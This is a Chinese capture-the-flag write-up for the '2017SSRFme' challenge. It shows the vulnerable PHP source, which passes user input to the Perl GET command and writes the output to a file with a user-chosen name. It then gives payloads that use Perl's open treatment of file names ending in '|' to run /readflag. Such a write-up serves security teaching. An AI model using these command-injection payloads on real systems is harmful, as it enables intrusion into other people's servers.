2017SSRFme

源码如下：

<?php
// 1. 检查是否存在 X-Forwarded-For 头，若存在则将 REMOTE_ADDR 设置为第一个IP
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; // 可控点：客户端可伪造IP
}

// 2. 输出客户端IP
echo $_SERVER["REMOTE_ADDR"];

// 3. 创建沙箱目录：基于固定字符串 "orange" + 客户端IP 的MD5值
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);      // 创建目录（如 sandbox/c6a6a758...）
@chdir($sandbox);      // 切换到该目录

// 4. 发起请求：通过 GET 参数 url 执行系统命令
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

// 5. 处理文件名参数，过滤目录名中的点
$info = pathinfo($_GET["filename"]);
$dir  = str_replace(".", "", basename($info["dirname"])); // 过滤目录名中的点
@mkdir($dir);          // 创建子目录
@chdir($dir);          // 进入子目录

// 6. 将请求结果写入文件（文件名可控）
@file_put_contents(basename($info["basename"]), $data);

// 7. 显示当前文件代码
highlight_file(__FILE__);

这题的关键点显然就在于GET参数url，首先创建一个测试目录，

/?url=/&filename=test

然后将orange与自己的ip地址拼接在一起进行MD5加密，加密后的值就是路径

进入目录

可以看到有flag，但是访问不了，我们可以用readingflag来访问

payload思路是GET，GET在执行过程中会调用Perl的open函数，如果文件名以 | 结尾，Perl 会将其视为命令并执行

构造payload

/?url=file:bash -c /readflag|&filename=bash -c /readflag|
 

/?url=file:bash -c /readflag|&filename=test

再访问之前test目录

得到flag